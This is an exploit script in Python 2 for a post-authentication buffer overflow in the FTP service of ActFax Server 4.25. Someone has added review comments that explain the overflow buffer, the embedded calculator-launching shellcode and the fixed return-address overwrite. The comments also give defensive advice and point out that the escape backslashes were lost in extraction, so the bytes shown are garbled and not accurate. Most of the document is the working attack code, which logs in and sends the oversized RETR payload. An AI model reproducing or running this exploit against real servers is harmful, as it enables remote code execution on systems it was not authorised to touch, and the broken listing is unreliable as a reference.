# Title : ActFax Server FTP Remote BOF (post auth)
# Published : 2011-02-16
# Author : chap0
#!/usr/bin/python
# Exploit Title: ActFax Server FTP Remote BOF (post auth)
# Date: Feb 15, 2011
# Author: chap0
# Software Link: http://www.actfax.com/download/actfax_setup_en.exe
# Version: Version 4.25, Build 0221 (2010-02-11)
# Tested on: Windows XP SP3 en
# Big thanks to Sud0 - and an extra greetz to mr_me -RESPECT
# Stay true my friends
import socket
# Proof-of-concept for a post-authentication buffer overflow in the FTP
# service of ActFax Server (the header above gives Version 4.25, Build 0221,
# tested on Windows XP SP3 en). After logging in, it sends a single RETR
# command whose argument is an oversized, crafted string.
#
# NOTE(review): Python 2 syntax (print statements). The escape backslashes
# appear to have been lost when this page was extracted, so sequences such as
# "n", "rn" and "x55" are literal characters here. The listing is therefore not
# byte-accurate as shown; do not derive detection signatures from this text.
#
# Defender view: the observable on the wire is an authenticated FTP session
# followed by a RETR argument of several hundred bytes, far longer than any
# plausible file path. Flagging or rejecting over-long FTP command arguments
# at a proxy or IDS covers this class of request. Also restrict who can reach
# and log in to the fax server's FTP port, since the bug sits behind
# authentication, and move to a vendor build that fixes it (no fixed version
# is stated on this page).

# Banner output only.
print "nActFax Server FTP Remote BOF"
print " chap0 - www.seek-truth.net n"
# pops calc
# Demonstration payload. Per the author's comment it launches the Windows
# calculator. The string consists only of printable ASCII characters;
# presumably an alphanumeric-encoded blob, though nothing here confirms that.
calccode = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkXlqELKZL587Pep7PdoaxsSSQbLPcLMw5JXbpX8KwOcHBPwkON0A"
# push ebp #pop eax #sub eax,55555521 * 3 :)
# Buffer layout: a short instruction prefix (described by the author's comment
# above), 135 "C" filler characters, the payload, then "A" padding so that
# payload plus padding always totals 616 characters.
junk = "x55x58x2Dx21x55x55x55x2Dx21x55x55x55x2Dx21x55x55x55" + "C"*135 + calccode + "A"*(616-len(calccode))
# The trailing value is labelled RETN by the author; presumably it overwrites
# the saved return address with a fixed address. A hard-coded address ties the
# PoC to the tested build/OS, and mitigations such as ASLR and DEP target this
# kind of fixed-address return overwrite.
payload = junk + "x37x27x40x00" #RETN
# Plain TCP connection to a hard-coded private (RFC 1918) address on port 21.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# socket.connect() returns None, so `connect` is never a usable value.
connect=s.connect(('192.168.1.2',21))
# Read and discard the server's greeting.
s.recv(1024)
# Log in first: the vulnerable command is only reached after authentication,
# so an account on the server is a precondition.
s.send('USER ' + 'chaporn')
print (s.recv(1024))
s.send('PASS chaporn')
print (s.recv(1024))
# The oversized string is delivered as the argument of RETR. No reply is read.
s.send('RETR ' + payload + 'rn')
# NOTE(review): without parentheses this only references the method and never
# calls it, so the socket is not explicitly closed here.
s.close